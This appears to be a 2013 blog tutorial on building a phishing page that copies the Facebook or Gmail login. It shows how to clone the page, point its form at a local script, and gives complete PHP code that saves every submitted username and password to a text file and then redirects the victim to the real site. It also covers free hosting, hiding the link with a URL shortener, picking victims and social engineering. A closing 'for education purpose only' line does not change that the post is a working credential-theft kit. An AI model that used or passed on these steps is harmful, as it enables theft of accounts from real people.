Sunday, September 1, 2013

What is a Phishing page?

The first thing we ask ourselves is, "What the hell is a phishing page?" Well, a phishing page is an exact copy of a webpage. It is used to trick someone into giving you their login details. Come to think of it, it's pretty easy to make.

Making the phishing page


The first thing you will need for the page is, a page. Just go to the site you want to copy, right-click the mouse and press "Save Page As..." Make a new folder in your computer and save the page in it with the name,"index.htm"
NOTE: The page must have a place where the target can enter login details, eg. the homepage of Facebook.
Now you will have to edit the index.htm file. Open it in a text editor, supposedly, notepad. Press, CTRL+F. Look for the keyword, "action."

For example, if you want to make a phishing page for Facebook, you'll get something like this:

action="https://www.facebook.com/login.php?login_attempt=1" method="post"
and if you're making one for Gmail, you'll get this:

action="https://accounts.google.com/ServiceLoginAuth" method="post"
What you have to do is simple. Change the part of the line that contains the URL to "login.php" For example, "https://www.facebook.com/login.php?login_attempt=1" will become "login.php" Next, Change the segment, "method=post" to "method=get"
The Segment should not look like this:

action="login.php" method="get"
Now, for the "login.php" file.
Just copy and paste this code into a notepad file and save it as "login.php" without the "s

  1. <?php
  2. header("Location: http://www.site.com");
  3. $handle = fopen("passes.txt", "a");
  4. foreach($_GET as $variable => $value)
  5. {
  6. fwrite($handle, $variable);
  7. fwrite($handle, "=");
  8. fwrite($handle, $value);
  9. fwrite($handle, "\r\n");
  10. }
  11. fwrite($handle, "\r\n");
  12. fclose($handle);
  13. ?>

NOTE: Change the link in the second line of the PHP script to the original URL of the site you want to copy.

header("Location: http://www.site.com");

Then, create a notepad file and name it to "passes"
I hope you have saved all of these files in a single folder.
Your phishing page is ready for upload.

Putting it online


You now have all the data required for the phishing page. Now you must host it on the internet. You can use any web hosting site like 5gbfree.com. Upload all of these files to your site. When you will open the link, you will get a ditto copy of the site you wanted to use!



The most important part of making a Phishing page is choosing your victims closely and persuading them into using the page. Remember to use tinyurl.com to shorten and hide the link before sending it your victim too. You must be a good Social Engineer in order for this to work.


NOTE: THIS IS FOR EDUCATION PURPOSE ONLY !!!

Popular Posts

Recent Posts